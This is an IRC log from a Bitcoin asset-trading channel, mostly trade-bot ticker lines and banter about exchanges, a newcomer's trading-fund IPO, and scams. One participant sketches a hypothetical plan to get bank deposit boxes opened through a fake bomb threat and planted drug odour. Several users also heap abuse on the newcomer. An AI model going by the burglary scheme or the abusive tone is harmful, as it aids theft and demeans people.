22 02:33:07 [BTCTC] [GSDPT] 60 @ 0.00351 = 0.2106 BTC [-] Apr 22 02:43:43 [BTCTC] [ASICMINER-PT] 1 @ 1.06 BTC [-] Apr 22 02:43:46 [BTCTC] [ASICMINER-PT] 1 @ 1.055 BTC [-] Apr 22 02:52:35 mircea_popescu: Dude Capital One sabotaged Bitfloor Apr 22 02:52:49 heh. Apr 22 02:53:03 We process for them and I'm looking at documents... Apr 22 02:53:13 holy shit this is soooo fucked up Apr 22 02:54:36 stop teasing Apr 22 02:55:32 I don't know who is on the wrong, but they claim "Undue risk" Apr 22 02:56:27 I wonder who will be next :P Apr 22 02:56:45 Looks like exchanges are better off storing the fiat under matresses... Apr 22 02:58:58 nah, they should buy bitcoin with that fiat Apr 22 03:04:41 [BTCTC] [GSDPT] 8 @ 0.00351 = 0.0281 BTC [-] Apr 22 03:04:50 [BTCTC] [GSDPT] 1768 @ 0.0035 = 6.188 BTC [-] Apr 22 03:16:01 [HAVELOCK] [HIM] 1 @ 1.82999989 BTC [+] Apr 22 03:19:03 [BTCTC] [GSDPT] 243 @ 0.0035 = 0.8505 BTC [-] Apr 22 03:19:18 this is an interesting concept. what risk is due ? Apr 22 03:19:39 [BTCTC] [ASICMINER-PT] 5 @ 1.05 = 5.25 BTC [-] Apr 22 03:19:43 [BTCTC] [ASICMINER-PT] 1 @ 1.0461 BTC [-] Apr 22 03:19:48 [BTCTC] [ASICMINER-PT] 1 @ 1.033 BTC [-] Apr 22 03:19:51 [BTCTC] [ASICMINER-PT] 1 @ 1.025 BTC [-] Apr 22 03:19:55 [BTCTC] [ASICMINER-PT] 1 @ 1.025 BTC [-] Apr 22 03:19:59 [BTCTC] [ASICMINER-PT] 2 @ 1.011 = 2.022 BTC [-] Apr 22 03:20:03 [BTCTC] [ASICMINER-PT] 5 @ 1.01 = 5.05 BTC [-] Apr 22 03:20:07 [BTCTC] [ASICMINER-PT] 1 @ 1.001 BTC [-] Apr 22 03:20:17 [BTCTC] [ASICMINER-PT] 3 @ 1 = 3 BTC [-] Apr 22 03:20:21 [BTCTC] [ASICMINER-PT] 3 @ 1 = 3 BTC [-] Apr 22 03:26:14 [MPEX] [S.MPOE] 12700 @ 0.00069635 = 8.8436 BTC [-] Apr 22 03:27:39 [MPEX] [S.BBET] 550 @ 0.0014 = 0.77 BTC [-] Apr 22 03:30:03 well you could mitigate at least a portion of it Apr 22 03:31:23 (ab)use mpex bot and then you are as weak as the weakest link Apr 22 03:31:35 i mean no, the strongest Apr 22 03:32:01 [HAVELOCK] [HIM] 2 @ 1.82999989 = 3.66 BTC [+] Apr 22 03:32:11 is it not so? Apr 22 03:39:48 [BTCTC] [ASICMINER-PT] 1 @ 1.01 BTC [+] Apr 22 03:43:40 mircea_popescu Capital One hate's risk, their loyalty platform runs in cobol because they are terrified of change... Apr 22 03:44:20 that's what happens when you're "Too big to fail" the smallest amount of risk is "unsettling" Apr 22 03:44:44 but it's kind of bullshit since most banks to unethical/illicit things anyways... Apr 22 03:49:13 https://bitcointalk.org/index.php?topic=182685.0 Apr 22 03:49:24 >The company’s trading algorithms currently run on electronic exchanges such as Nasdaq, BATS, EDGE, NYSE, and BTC-E. Apr 22 03:49:53 i think he is 21 days late. Apr 22 03:50:16 or 20, depends what your local time is. Apr 22 03:51:00 [HAVELOCK] [VTX] 9 @ 0.4855555 = 4.37 BTC [+] Apr 22 03:59:19 [MPEX] [S.MPOE] 11100 @ 0.00069717 = 7.7386 BTC [+] Apr 22 03:59:22 [MPEX] [S.MPOE] 6224 @ 0.000695 = 4.3257 BTC [-] Apr 22 03:59:29 [MPEX] [S.MPOE] 1926 @ 0.00069452 = 1.3376 BTC [-] Apr 22 04:00:29 thestringpuller: not suprising really, don't know about US but here there is legistlation covering banking technology Apr 22 04:02:01 e.g. if a bank causes losses due to technical fuckup people can get charged with a crime Apr 22 04:03:31 kakobrekla lol Apr 22 04:04:11 Shares: 100,000 Price: .20 bitcoins, but tbd by free market Apr 22 04:04:21 imo the best part. Apr 22 04:04:35 !ticker btctc ASICMINER-PT Apr 22 04:04:38 [BTCT:ASICMINER-PT] 1D: 1 / 1.09486 / 1.2 (182 shares, 199.3 BTC), 7D: 0.79 / 1.08844 / 1.75 (1627 shares, 1770.9 BTC), 30D: 0.59998 / 0.82495 / 1.75 (8260 shares, 6814.1 BTC) Apr 22 04:04:44 [BTCTC] [ASICMINER-PT] 1 @ 1.1098 BTC [+] Apr 22 04:05:07 he's going to do 3x better than asicminer on the strength of having made a forum post. Apr 22 04:06:27 mircea_popescu: what is your opinion on asicminer? Apr 22 04:06:39 bout the same as a month ago Apr 22 04:06:48 I never got the memo. Apr 22 04:06:55 CAUSE IT'S BEHIND A PAYWALL! Apr 22 04:07:11 [BTCTC] [ASICMINER-PT] 1 @ 1.1098 BTC [+] Apr 22 04:08:54 [BTCTC] [ASICMINER-PT] 8 @ 1.1098 = 8.8784 BTC [+] Apr 22 04:09:24 [BTCTC] [ASICMINER-PT] 1 @ 1.1098 BTC [+] Apr 22 04:11:54 well... Apr 22 04:12:02 i dont think i ever wrote about it on my blog Apr 22 04:12:09 i think you just asked me the same q a month ago Apr 22 04:12:19 what is that picture of your family gathering about Apr 22 04:12:27 is MPOE-PR female now or not Apr 22 04:12:31 i'm foncused :( Apr 22 04:13:06 [BTCTC] [ASICMINER-PT] 2 @ 1.01 = 2.02 BTC [-] Apr 22 04:13:17 cool Apr 22 04:15:14 WINTER IS COMING Apr 22 04:15:25 Mark my words Apr 22 04:16:13 haha wat? it's been snowing here all month. Apr 22 04:16:20 winter is still here. Apr 22 04:16:34 [BTCTC] [ASICMINER-PT] 10 @ 1.05 = 10.5 BTC [+] Apr 22 04:16:49 my rosemary bush is in bloom Apr 22 04:16:59 you've not seen something like this, it looks like a lilac. Apr 22 04:17:19 [BTCTC] [BASIC-MINING] 4 @ 0.41001 = 1.64 BTC [-] Apr 22 04:17:22 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [-] Apr 22 04:17:39 [BTCTC] [CRYPTO-TRADE] 10 @ 0.19989 = 1.9989 BTC [+] Apr 22 04:18:08 we got like 7" of snow last week easy. Apr 22 04:18:10 http://vancouver.en.craigslist.ca/van/ele/3758263779.html Apr 22 04:18:11 https://www.bitlc.net/ lol Apr 22 04:18:11 lol Apr 22 04:18:30 hello kakobrekla from bitcointalk suggested I come here Apr 22 04:18:46 regarding an upcoming IPO posting Apr 22 04:18:51 thread I made Apr 22 04:19:08 lmao Apr 22 04:19:14 he did the right thing! Apr 22 04:19:43 great, conditioning in its finest Apr 22 04:19:47 mircea_popescu: tl;dr Apr 22 04:19:50 Domestic Limited-Liability Company Apr 22 04:19:50 File Number: 2012-000626131 Apr 22 04:19:50 Filing State: Wyoming (WY) Apr 22 04:19:50 Company Age: 9 Months Apr 22 04:19:50 Principal Address: Po Box 20539 Apr 22 04:19:50 New York, NY 10001 Apr 22 04:19:50 Mailing Address: Po Box 20539 Apr 22 04:19:50 New York, NY 10001 Apr 22 04:19:52 is that you ? Apr 22 04:20:07 yes, continued from Nevada Apr 22 04:20:13 so 2 years Apr 22 04:20:27 are you that fuckwited in the head to imagine anyone in bitcoin gives two shits about your pointless llc ? Apr 22 04:20:45 elaborate? Apr 22 04:20:51 people are interested in high frequency trading Apr 22 04:20:53 no. shut the fuck up. Apr 22 04:20:58 hahahaha Apr 22 04:20:59 go on Apr 22 04:21:00 read here for six months or a year Apr 22 04:21:02 get with the program Apr 22 04:21:23 then maybe you ipo something for 500 or so coins. Apr 22 04:21:27 maybe. Apr 22 04:21:59 you haven't told me anything about what the problem with the document was Apr 22 04:22:11 there is no document Apr 22 04:22:16 the OP Apr 22 04:22:17 the thread Apr 22 04:22:18 just an ignorant idiot (you) Apr 22 04:22:25 now stop talking to me before you go on my ignore Apr 22 04:22:30 and do what you are told. Apr 22 04:22:45 lol wow this is the most upset I've seen mr. popescu Apr 22 04:22:48 good job stslimited Apr 22 04:22:58 no but it's beyond outrage this shit. Apr 22 04:23:15 I mean, harr harr senior member of an incrowd picks on new user in their own channel Apr 22 04:23:30 woop de doo thats never happened on the internet Apr 22 04:23:38 i mean asicminer trades 6k btc in a month on btct herpderp here's guy with a 20k btc plan. Apr 22 04:23:48 okay Apr 22 04:23:49 he has no fucking idea what's what and we're all playing at internets. Apr 22 04:23:58 lmao Apr 22 04:23:59 doth not work, this. Apr 22 04:24:05 oh, the number of shares was in bitcoins Apr 22 04:24:38 x.x Apr 22 04:25:13 why do you feel that an algorithmic trading fund is not structured as correctly as the mining share companies Apr 22 04:25:14 [BTCTC] [ASICMINER-PT] 1 @ 1.1098 BTC [+] Apr 22 04:25:19 this is what I came in here for Apr 22 04:25:30 stslimited!*@* added to ignore list. Apr 22 04:26:44 ;;getatin stslimited Apr 22 04:26:44 Error: "getatin" is not a valid command. Apr 22 04:26:49 ;;getrating stslimited Apr 22 04:26:50 This user has not yet been rated. WARNING: Currently not authenticated. Apr 22 04:26:58 okay lets start Apr 22 04:27:03 I'm a n00b Apr 22 04:27:09 And even I am in the OTC Apr 22 04:27:11 you are not Apr 22 04:27:14 why should I invest in you? Apr 22 04:27:21 how can I even trust you? Apr 22 04:27:27 yes... Apr 22 04:27:35 WoT so to speak Apr 22 04:27:39 (Web of Trust) Apr 22 04:28:01 mircea_popescu: is he on your ignore yet? Apr 22 04:28:03 [BTCTC] [RSM] 1 @ 0.0056 BTC [+] Apr 22 04:28:07 yes. Apr 22 04:28:14 thestringpuller: just because every hft/etf in bitcoin to date has been a thinly disguised robbery don't mean this guy aint legit Apr 22 04:28:27 sign me up! Apr 22 04:28:32 LMIOT Apr 22 04:28:33 dub i thought you were with the tl;dr program Apr 22 04:28:52 mircea_popescu: what is that bitcoin drama timeline post you had? Apr 22 04:29:03 ok i gotta try this Apr 22 04:29:10 ;;google bitcoin drama timeline post i had Apr 22 04:29:11 BitCoin Drama Continues After Hours | Zero Hedge: ; The Bitcoin Drama Timeline pe Trilema - Un blog de Mircea Popescu.: ; bitcoin posts on CNET - Cnet TV: Apr 22 04:29:22 pesky zh how dare they Apr 22 04:29:35 [BTCTC] [GSDPT] 1 @ 0.00391 BTC [+] Apr 22 04:29:40 stslimited: read http://trilema.com/2012/the-bitcoin-drama-timeline/ Apr 22 04:30:07 stslimited: there probably is one, and certianly many operating in private, the problem as mircea_popescu is trying to elloquate is trust Apr 22 04:30:26 no. Apr 22 04:30:48 the problem i am discussing is ignorance. this fuckwit proceeds to not even bother researching the field before "building" nonsense. Apr 22 04:30:52 stslimited: you really need to start small and earn it, there is no easy route Apr 22 04:31:03 ^ exactly Apr 22 04:31:20 he has no fucking idea about anything whatsoever other than "o i saw this [uninformed] thing about bitcoin cause the price went up" Apr 22 04:31:21 what does it matter? Apr 22 04:31:23 stslimited: this is for the obvious reason that there is no way for anyone to recover bitcoins entrusted to you if you decide to be untrustworth Apr 22 04:31:43 *y Apr 22 04:31:46 stslimited: lets take a look at numbers Apr 22 04:31:48 For the actuarially inclined, the total losses to theft, fraud and stupidity plus anything in between amount to 1.296 million BTC. Apr 22 04:32:06 Even if you have the best intentions, this world is ruthless. Apr 22 04:32:27 So how would you not end up losing money? Apr 22 04:32:40 even if not from directly trying to scam us, you maybe inept like many others before you Apr 22 04:32:52 then you are added the graveyard of dead companies that keeps piling up Apr 22 04:32:54 another body Apr 22 04:33:31 pirates nav increas was very nice Apr 22 04:33:41 HAHAHAHA Apr 22 04:33:46 indeed Apr 22 04:33:47 kakobrekla aussie_striker's is better. go with the found. Apr 22 04:33:58 that fact you don't know who pirate is raises grave concerns Apr 22 04:34:13 you are unwilling to educate yourself, and that is mircea_popescu's issue Apr 22 04:34:51 are you kidding? Apr 22 04:35:03 there are millions upon millions of dollars done in trade in otc Apr 22 04:35:26 the WoT is for bitcoin millionaires to quote MPOE-PR, the very people who's coin you are trying to solicity Apr 22 04:35:29 solicit* Apr 22 04:37:18 Yes, but take a look at Ziggap. Apr 22 04:37:42 Ziggap was in theory a competitor to Bitinstant, and it's IPO sold out in some like 3-5 hours Apr 22 04:37:42 theres no real reason to try to persuade us Apr 22 04:38:01 just do it and be prepared for flames Apr 22 04:38:09 and for only noobs to throw money at it Apr 22 04:38:22 Ziggap was ipo'ed by someone who has one of the highest WoT rating Apr 22 04:38:36 yet it's price has plummeted below IPO levels just like facebook Apr 22 04:38:47 thats not a good example Apr 22 04:38:56 how are you so sure you won't encounter hurdles as you scale even if you have "a proven platform" Apr 22 04:38:59 thestringpuller, who had, not has. Apr 22 04:39:02 aethero's wot is made up of all teh micro loan muppets Apr 22 04:39:10 true Apr 22 04:39:11 he screams scammer Apr 22 04:39:11 yes, kakobrekla had* my mistake Apr 22 04:39:21 dat also Apr 22 04:39:24 ^ - yup Apr 22 04:39:35 dub how did the entire aethero thing play out btw ? Apr 22 04:39:45 mircea_popescu: it's still in progress Apr 22 04:39:48 dunno, I wouldnt touch it with yours Apr 22 04:39:50 "to be continued" Apr 22 04:40:03 i c Apr 22 04:40:25 the website is super down Apr 22 04:40:38 last i heard the website was donw and deprived was smelling blood. Apr 22 04:40:51 I think they went bankrupt. Apr 22 04:40:58 Someone gamed them, using the chargebacks. Apr 22 04:41:04 So they had to shut down. Apr 22 04:41:43 but it is. how long have you been operating, and what are your profit margins? Apr 22 04:41:52 how come this is the first ANYONE in this channel has heard of you? Apr 22 04:43:50 stslimited: some guidelines for you: 1) stop trying to hype your deal here, anyone with coin has already tuned out 2) hype notwithstanding; obtain an IRC client, stay in this channel and contribute 3) show us your id, shit you have done before, show up IRL at bitcoiny things Apr 22 04:44:22 stslimited: 4) do your hft thing, you'll probably get some bites, be prepared to start small and 5) don't steal peoples shit Apr 22 04:44:46 stslimited: don't try to go from gangst to godfather in a night Apr 22 04:44:50 gangsta* Apr 22 04:44:54 since when is dub a contributing member with like positive shit and everything ?! Apr 22 04:44:59 how long have i been asleep ?! Apr 22 04:45:09 Hahahaha. Since tonight it seems. :D Apr 22 04:45:17 sometimes I forget to troll Apr 22 04:45:17 dub is full of surprises Apr 22 04:45:42 lol k Apr 22 04:45:54 6) don't piss off mircea_popescu Apr 22 04:46:01 or maybe I'm just trolling you guys be encouraging the latest scam Apr 22 04:46:11 the moral of the story being that the more of an asshole i am, the more inclined even the hardcorest trolls are to halp. Apr 22 04:47:03 oooh a popescu meme appears Apr 22 04:47:13 picture of popescu frowning: "I'm real tired of your shit" Apr 22 04:48:49 thestringpuller http://trilema.com/wp-content/themes/trilema/images/bg_july2009.jpg Apr 22 04:48:51 there's your base Apr 22 04:50:05 [MPEX] [S.MPOE] 11126 @ 0.00069525 = 7.7354 BTC [+] Apr 22 04:50:07 [MPEX] [S.MPOE] 10600 @ 0.00069789 = 7.3976 BTC [+] Apr 22 04:50:22 you smokin a blunt mircea_popescu ? Apr 22 04:50:34 lololol Apr 22 04:50:40 i can not say for legal considerations i can not disclose. Apr 22 04:50:46 stslimited: the moral is you are completely unknown and asking people to let you hold their irreversably transferred internet coins Apr 22 04:54:56 thestringpuller anyway the deprived theory iirc was that the entire ipo was simply to float living expenses and that was all. Apr 22 04:55:38 sorta like a simplified bdt Apr 22 04:55:55 we all saw how BDT went... Apr 22 04:56:19 i called that one here. Apr 22 04:56:25 for the record. Apr 22 04:56:30 lol Apr 22 04:56:31 :p Apr 22 04:56:34 i wonder how many ipo's ended up being pocketed... Apr 22 04:56:43 I'm still waiting for credit on calling usagi Apr 22 04:57:08 kakobrekla yeah Apr 22 04:58:01 usagi is just inept Apr 22 04:58:31 s/ept/sane Apr 22 04:58:38 HAH Apr 22 04:58:51 stslimited: uh not S.DICE and S.MPOE Apr 22 04:58:57 those are pretty old Apr 22 04:59:03 S.BBET is pretty young Apr 22 04:59:07 dub you can't get credit. would you like a debit ? Apr 22 04:59:40 ZigGap stands on top as the most trusted method for purchasing BTC, and plans to offer the widest array of methods to buy Bitcoin. <<< lol Apr 22 04:59:51 just enroll me in the next tranch of $MEME.Z Apr 22 04:59:58 XD Apr 22 05:00:05 ;;rate dub 1 credit on calling usagi Apr 22 05:00:07 Rating entry successful. Your rating for user dub has changed from 1 to 1. Apr 22 05:00:17 bewm Apr 22 05:00:26 [BTCTC] [PAJKA.BOND] 1 @ 0.096 BTC [-] Apr 22 05:00:27 so wtf was this bitlc thing in the end ? Apr 22 05:00:33 i never could figure it out and now it's gone. Apr 22 05:00:45 [BTCTC] [PAJKA.BOND] 5 @ 0.091 = 0.455 BTC [-] Apr 22 05:01:45 dub: were you the one who made the "Usagi ftw" bet? Apr 22 05:01:58 "Usagi will have an asset listed on MPEX by April 1st 2013" Apr 22 05:02:00 rg suddenly has time to troll in -otc Apr 22 05:02:01 or something like that Apr 22 05:02:10 thats a twist Apr 22 05:02:28 or maybe has been going for a while Apr 22 05:02:29 thestringpuller: negative Apr 22 05:02:39 dunno Apr 22 05:03:12 the only bet I made was 'DMC will never do anything every and eveyone will lose money' it got rejected :( Apr 22 05:03:27 ever* Apr 22 05:03:44 oh wait I did th empex will get hacked one too Apr 22 05:03:47 https://www.bitlc.net/assets/system_infrastructure_full.jpg this makes so little sense it boggles my mind Apr 22 05:04:16 mpex was hacked ? Apr 22 05:05:18 no when you offered reddit a bounty to hack it Apr 22 05:07:02 o yeah Apr 22 05:07:15 mircea_popescu, i love the 'no internet access' server on ec2 Apr 22 05:07:33 orkaa also what use does a pool server have of a dedicated db server ? Apr 22 05:07:45 maybe i don't understand mining but... mempool right ? it's in ram. Apr 22 05:08:15 gotta store balances and shit Apr 22 05:09:08 mircea_popescu: this is really just a clever new way of promoting "VM escape exploit" research. Apr 22 05:09:32 spell that out for me Apr 22 05:10:08 sometimes, exploits are discovered that let you break out of a VM (like the onces on Amazon's EC2) and take over the physical hardware Apr 22 05:10:22 from that point, you can snoop/modify the customer VMs, for whatever purpose you like. Apr 22 05:10:40 *ones Apr 22 05:10:47 so he's holding btcs in there to encourage others to try and break into his amazon vm ? Apr 22 05:11:04 maybe not deliberately, but what difference does it make Apr 22 05:11:29 such a conspiracist you are Apr 22 05:12:18 he even helpfully tells us that we need to exploit EC2/Ireland. Apr 22 05:13:49 asciilifeform you are aware this is a dead service right ? Apr 22 05:14:08 mircea_popescu: well... now I am. Apr 22 05:14:25 I don't really keep up with btcdrama in real time Apr 22 05:14:52 this is why I defended linode, erryone crying about linode security, nobody pointing finger at the tards running hot wallet on shared servers Apr 22 05:15:00 cjeck out the root, it's on the amusing side of lol. Apr 22 05:15:37 dub at the time we were poor. Apr 22 05:15:44 The mean stream media (msm) seem to be hyping bitcoin lately and I can't figure why. Apr 22 05:15:47 MSM is presenting bitcoin in a much better light than it use to. It is being featured on WSJ, BBC, ft, CNN, CNBC, etc. These outfits are not known for featuring the real stories, or at least those that question the status quo. We constantly criticize the msm for its sycophantic propagandist reporting, but because they are featuring bitcoin we are cool with it. Apr 22 05:15:52 Something smells rotten in Denmark.The mean stream media (msm) seem to be hyping bitcoin lately and I can't figure why. Apr 22 05:15:52 the idea that "only dedicated for bitcoin" is a lot harder to push on a 1.5 dollar btc Apr 22 05:15:56 MSM is presenting bitcoin in a much better light than it use to. It is being featured on WSJ, BBC, ft, CNN, CNBC, etc. These outfits are not known for featuring the real stories, or at least those that question the status quo. We constantly criticize the msm for its sycophantic propagandist reporting, but because they are featuring bitcoin we are cool with it. Apr 22 05:16:48 oops Apr 22 05:16:51 WOW LAG Apr 22 05:17:16 WHY PUTTY WHY DID YOU MAKE ME SPAM Apr 22 05:17:17 :( Apr 22 05:17:24 shit tyrone, get it together. Apr 22 05:17:49 thestringpuller: people with old-fashioned money and connections bought in. This much is clear as daylight at this point. Apr 22 05:17:58 ya think ?! Apr 22 05:20:07 I'm not so sure about that Apr 22 05:20:17 The news seem to be dying Apr 22 05:20:22 Seems more like a fad Apr 22 05:20:26 Than anything Apr 22 05:20:41 https://bitcointalk.org/index.php?topic=181245.0;all quoted for bolded paragraph Apr 22 05:20:42 And with the peak and crash, now that it returned lower Apr 22 05:20:47 No longer that interesting Apr 22 05:20:54 ;;ticker Apr 22 05:20:55 BTCUSD ticker | Best bid: 121.00001, Best ask: 121.53998, Bid-ask spread: 0.53997, Last trade: 121.00001, 24 hour volume: 98052.49947353, 24 hour low: 110.00000, 24 hour high: 129.00000, 24 hour vwap: 120.94707 Apr 22 05:20:57 re: the defunct EC2 wallet: I'd advise anyone against telling his web host that he is hosting a wallet on the latter's disks. Or, for that matter, letting it be known that a certain bank deposit box has paper coldwallets in it. Apr 22 05:21:04 seems pretty decent to me, 120. Apr 22 05:21:16 your hosting provider and bank manager might be saints, or they might not be. Apr 22 05:21:38 asciilifeform im pretty sure it's impossible for bank manager to go into boxes. Apr 22 05:22:08 however it is the police (or hypothetical Gold Confiscators (TM) ) get in Apr 22 05:22:14 locksmiths exist, etc Apr 22 05:23:05 pretty much everything upon this earth that is worth back-dooring, has been back-doored (esp. in the good old U.S.A.) Apr 22 05:23:08 actually, the evolution of paper gold vs rthe real article has been fascinating past week Apr 22 05:23:15 the premium is what, 30% by now ? Apr 22 05:23:19 Yeah, I just mean, about the media, seems like they moved to the next thing. Apr 22 05:23:27 Namworld a good thing i say. Apr 22 05:23:36 BTC price is still decent. Seems a bit high tho Apr 22 05:23:38 no bubble to see here, move on to shiny rocvks. Apr 22 05:23:44 Of course it's a good thing Apr 22 05:23:57 mircea_popescu: AFAIK "allocated" paper has been pretty close to the price of physical Apr 22 05:24:06 That hype didn't do much good. Apr 22 05:24:17 asciilifeform not lately. Apr 22 05:24:21 paper has been dumped massively. Apr 22 05:26:29 mircea_popescu: *allocated* paper. example: Bullionvault corp. new york branch quotes $1422 (buy; http://www.bullionvault.com/) Canadian mint: $1419. (http://www.apmex.com/Category/1158/1_oz_Gold_Bars_Only.aspx) Apr 22 05:27:38 one could debate whether allocated paper-gold is any less of a ripoff than the usual imaginary kind, but the fact remains. Apr 22 05:29:32 mircea_popescu: that thread is gold Apr 22 05:29:52 I like the cut of this pizza's gib Apr 22 05:29:58 asciilifeform hm right you are Apr 22 05:30:12 I will describe a process for extracting paper wallets from a bank box, just so it doesn't surprise anyone when it actually happens: Apr 22 05:30:36 one day, a bomb threat is called into the bank Apr 22 05:30:44 police dogs search the place, find no bomb Apr 22 05:30:56 but the deposit box room is found to smell a little of marijuana Apr 22 05:31:08 the boxes are opened, the contents photographed. Apr 22 05:31:16 and so forth. Apr 22 05:31:32 start writing books or something Apr 22 05:31:35 that could work Apr 22 05:31:53 containers aren't opened are they. Apr 22 05:32:21 depends. perhaps your envelope will smell especially strongly. (squirt bottle.) Apr 22 05:32:31 dub https://bitcointalk.org/index.php?topic=173227.msg1907593#msg1907593 have more. Apr 22 05:32:48 asciilifeform afaik this has not in fact happened, Apr 22 05:33:00 ie you still need a court order and identified boxes tio have tghem opened. Apr 22 05:33:09 mircea_popescu: I didn't say it had already happened. Apr 22 05:33:15 a a Apr 22 05:33:43 >Reported to police (they are really no help, so much for paying their salary, seems they've gotten fbi reports about bitcoins and don't really like them, started asking if I pay taxes on them...), Apr 22 05:33:47 O_O Apr 22 05:33:49 well for that money if you can check out womenyou can probably have Apr 22 05:33:51 oops Apr 22 05:34:01 they had door-to-door house searches in Boston last week, without any messy paperwork. Apr 22 05:34:05 well for that money if you can check out women's parts through clothes you can probably check out printed paper through sheet metal Apr 22 05:34:44 asciilifeform yeah. pretty outrageous stuff that. Apr 22 05:34:58 in any system, find the real weak point. anyone who can access the vault during off-hours and pause the camera recorder, can pick the locks at his leisure. Apr 22 05:35:37 [BTCTC] [ASICMINER-PT] 5 @ 1.1 = 5.5 BTC [-] Apr 22 05:36:03 banks aren't video rental stores. Apr 22 05:36:22 my point wasn't that this kind of scenario will become routine, but that it is unwise to tell people without a need-to-know exactly where your coldwallet physically lives. Apr 22 05:36:38 whats that movie where some limeys steal royal noodz from a deposit box? Apr 22 05:37:07 well for sure it's unwise to spread info wider than it needs to go. Apr 22 05:37:41 dub one of the many dumbass things where that guy from pulp fiction tries to parlay his momentary fame into a career ? Apr 22 05:37:42 mircea_popescu: from the standpoint of an owner or other person with unhindered physical access, a bank is exactly the same as a video store. Apr 22 05:37:59 nobody has unhindered access tho. Apr 22 05:38:33 firemen. banks do occasionally burn. esp. if they need to. Apr 22 05:39:47 ya, fire is a serious problem for paper wallets. Apr 22 05:39:57 with or without all this complex discussion. Apr 22 05:40:41 which is why you store it in 35 places, and use Shamir's algorithm (http://en.wikipedia.org/wiki/Secret_sharing) Apr 22 05:41:12 and no one but you should know of more than a few of them. Apr 22 05:41:34 So tell me mircea, are you short on BTC right now? Apr 22 05:41:42 Namworld nah. Apr 22 05:42:00 I'm one of the few bears around in the "speculation" channels it seems. Apr 22 05:42:28 you have to understand tho, none of the major players will even be net short for strategic reasons. Apr 22 05:42:33 not if they have any sense anyway. Apr 22 05:43:06 I suppose Apr 22 05:43:21 Still Apr 22 05:43:39 https://bitcointalk.org/index.php?topic=180663.0 Apr 22 05:44:11 You've probably read a few news as we approached the peak. They were getting... crazy/unlikely. Quite the craze. Apr 22 05:44:17 I decided to go short Apr 22 05:44:41 I do not regret Apr 22 05:44:46 [BTCTC] [ASICMINER-PT] 5 @ 1.1 = 5.5 BTC [-] Apr 22 05:45:30 if you shorted over 200 you're well in the money now. Apr 22 05:45:52 I shorted what I had available at 230-250 Apr 22 05:46:07 I'm quite sad I had so much placed into assets at that time Apr 22 05:47:23 um Apr 22 05:47:34 whart do you mean ? shorting and selling are different concepts. Apr 22 05:48:22 Yes, my bad. **** BEGIN LOGGING AT Mon Apr 22 12:08:23 2013 Apr 22 12:11:43 I wonder what will become of this sillyness: https://twitter.com/mikko/status/326237176402673664 Apr 22 12:11:57 pizzaman1337 for the record : nothing. Apr 22 12:12:06 mmk Apr 22 12:12:36 also the guy is blocked on my twitter, which means he must have been sts-like at some point Apr 22 12:13:11 Mikko? he's just a researcher Apr 22 12:13:42 hey Apr 22 12:13:47 how's it going everyone Apr 22 12:14:02 [MPEX] [S.MPOE] 10812 @ 0.00070528 = 7.6255 BTC [-] Apr 22 12:14:21 o look who's back Apr 22 12:14:36 hehehe Apr 22 12:14:37 pizzaman1337 musta done some real bad research i guess Apr 22 12:28:00 [MPEX] [S.MPOE] 4139 @ 0.0006981 = 2.8894 BTC [-] Apr 22 12:28:01 [MPEX] [S.MPOE] 8661 @ 0.00069452 = 6.0152 BTC [-] Apr 22 12:42:56 [BTCTC] [ASICMINER-PT] 1 @ 1.2495 BTC [+] Apr 22 12:43:02 [BTCTC] [ASICMINER-PT] 1 @ 1.2496 BTC [+] Apr 22 12:43:07 [BTCTC] [ASICMINER-PT] 1 @ 1.2497 BTC [+] Apr 22 12:44:37 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [+] Apr 22 12:52:29 mt gox stop trading in sgd? Apr 22 12:53:13 yes, preparing for introduction of ltc etc Apr 22 12:53:35 i see, thanks mp Apr 22 12:55:01 bit_nutz i was being facetious, for the record. Apr 22 12:57:04 lol they haven't goxxed ltc yet... Apr 22 12:57:14 [MPEX] [S.MPOE] 6588 @ 0.00069834 = 4.6007 BTC [+] Apr 22 12:57:16 [MPEX] [S.MPOE] 3018 @ 0.00070857 = 2.1385 BTC [+] Apr 22 12:57:55 ahh romanian smoked cheese + anchoves on american style pancakes Apr 22 12:58:00 fusion is where it's at i tell you! Apr 22 12:59:27 :) Apr 22 12:59:51 eventually we can open the first romanian fusion haute cuisine restaurant that accepts bitcoin lol Apr 22 13:25:39 get 3.5 michelin stars Apr 22 13:35:20 greets from budapest...finally :) Apr 22 13:35:42 but i realized i don't have anywhere to rush anyway Apr 22 13:37:46 jurov: HI! Apr 22 13:39:14 [BTCTC] [S.DICE-PT] 1 @ 0.00367 BTC [-] Apr 22 13:39:30 jurov is becoming a philosopher :D Apr 22 13:40:54 [BTCTC] [S.DICE-PT] 1 @ 0.00367 BTC [-] Apr 22 13:45:48 [BTCTC] [S.DICE-PT] 1 @ 0.00367 BTC [-] Apr 22 13:49:53 ;;goxlag Apr 22 13:49:54 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 22 13:50:01 whoa! mtgox is finally ready for hft! Apr 22 13:50:24 Hi mjr_ Apr 22 13:59:45 [BTCTC] [ASICMINER-PT] 1 @ 1.19001 BTC [-] Apr 22 13:59:48 [BTCTC] [ASICMINER-PT] 1 @ 1.19 BTC [-] Apr 22 14:09:01 https://bitcointalk.org/index.php?topic=183044.0 Apr 22 14:09:09 Someone take me up on this >:) Apr 22 14:10:10 bowjob you forgot to include an url Apr 22 14:11:01 right Apr 22 14:11:13 I feel confident in this game, that I;m willing to do a 1:10 odds Apr 22 14:11:31 So, bet 0,1 btc, win 1 BTC if you can beat me Apr 22 14:12:50 or play sd ^^ Apr 22 14:13:10 http://webchat.freenode.net/?channels=#bitcoin-assets Apr 22 14:13:13 oops Apr 22 14:13:27 https://bitcointalk.org/index.php?topic=183044.0 Apr 22 14:16:11 SD is a guaranteed loss overtime Apr 22 14:16:20 unless you are a shareholder Apr 22 14:16:43 29,99€ for an arcade? Apr 22 14:17:29 no fuck you capcom Apr 22 14:17:39 it should be worth more than that. the game is fun as hell Apr 22 14:25:10 Shareholders also lose on SD :/ Apr 22 14:25:24 I remember buying at 0.6 Apr 22 14:25:35 I got out at 0.62 Apr 22 14:25:36 :p Apr 22 14:25:55 and 0.75. I missed out on the 0.19 panic Apr 22 14:26:05 0.12 even Apr 22 14:26:12 any news ? Apr 22 14:26:13 did it go that low? O; Apr 22 14:26:16 yeah I bought at 0.2 as well Apr 22 14:26:24 and resold at .45 Apr 22 14:26:29 so it's not all bad Apr 22 14:26:35 but still Apr 22 14:26:53 I have a respectable amount of shares in SD Apr 22 14:27:13 at least div 